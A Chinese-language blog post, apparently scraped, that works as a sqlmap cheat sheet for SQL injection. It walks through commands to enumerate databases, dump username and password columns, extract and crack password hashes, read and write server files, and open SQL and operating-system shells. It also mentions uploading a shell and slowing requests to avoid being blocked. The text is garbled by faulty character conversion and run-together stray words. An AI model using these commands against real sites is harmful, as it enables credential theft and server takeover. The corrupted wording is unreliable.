sqlmap簡單流程使用

-u 「(url)」 php

一、判斷可注入的參數 二、判斷能夠用那種SQL注入技術來注入 三、識別出哪一種數據庫 四、根據用戶選擇,讀取哪些數據

sqlmap支持五種不一樣的注入模式:python

一、基於布爾的盲注,便可以根據返回頁面判斷條件真假的注入。 二、基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增長)來判斷。 三、基於報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。 四、聯合查詢注入,可使用union的狀況下的注入。 五、堆查詢注入,能夠同時執行多條語句的執行時的注入。若是支持注入,sqlmap會顯示存在什麼樣的注入類型若是知道什麼卡類型數據庫能夠指定--dbms=mysql oracle mssql等而後查看一下是不是DBA sqlmap -u "url" --is-dba若是是dba權限比較大咱們能夠執行一些命令或者上傳一下shell。看一下用戶名sqlmap -u "url" --current-user查看一下都有什麼數據庫sqlmap -u "url" --dbs若是權限很大能夠跨庫查詢查看一下當前使用的數據庫sqlmap -u "url" --current-db查看一下這個數據庫的表名sqlmap -u "url" -D datebase --tables保存用戶名密碼的表名多是admin password user admin_user system manage member等查看一下列名sqlmap -u "url" -D datebase -T table --columns查看一下數據sqlmap -u "url" -D datebase -T table -C username,password --dump上面爲簡單使用咱們能夠查看一下數據庫都有什麼用戶sqlmap -u "url" --users能夠查看當前數據庫用戶的密碼sqlmap -u "url" --passwords能夠選擇保存hashes數據用外部程序爆破密碼或者選擇自帶字典或者別的目錄的字典用sqlmap來爆破密碼能夠查看一下用戶的權限(可以執行什麼命令)sqlmap -u "url" --privileges查看一下數據庫的架構sqlmap -u "url" --schema --batch --exclude-sysdbs-v 顯示調試信息 7個級別0 只顯示python錯誤以及嚴重的信息1 同時顯示基本信息和警告信息 (默認)2 同時顯示debug信息3 同時顯示payload4 同時顯示http請求5 同時顯示http響應頭信息6 同時顯示http相應頁面測試語句能夠在xml\payloads.xml中找到能夠研究一下-m 制定url列表文件參數 --common-tables 當時用--tables沒法獲取數據庫表時,可使用此參數適用於下列狀況mysql版本低於5.0沒有information_schema表數據庫是microsoft Access 系統表MSysObjects是不可讀的(默認)當前用戶沒有權限讀取系統中保存數據結構的表的權限。暴力破解的表在/txt/common-tables.txt中,能夠本身添加--common-columns 同上 用於列名cookie 注入sqlmap -u"cookie.sql.com/test.php" --cookie "id=11" --level 2 url中參數加在cookie參數後面 level最少指定2HTTP Cookie在level爲2的時候就會測試,HTTP User-Agent/Referer頭在level爲3的時候就會測試。post表單sqlmap -u "url" --formsqlmap -u "url" --date "username=123&password=123" (hackbar獲取)請求延遲 請求過快可能被封--delay=5文件操做讀寫--file-read=""--file-write=""命令執行sql--sql-query="語句"--sql-shell 返回一個shell系統命令執行--os-cmd--os-shell--tamper 加載腳本
相關文章
相關標籤/搜索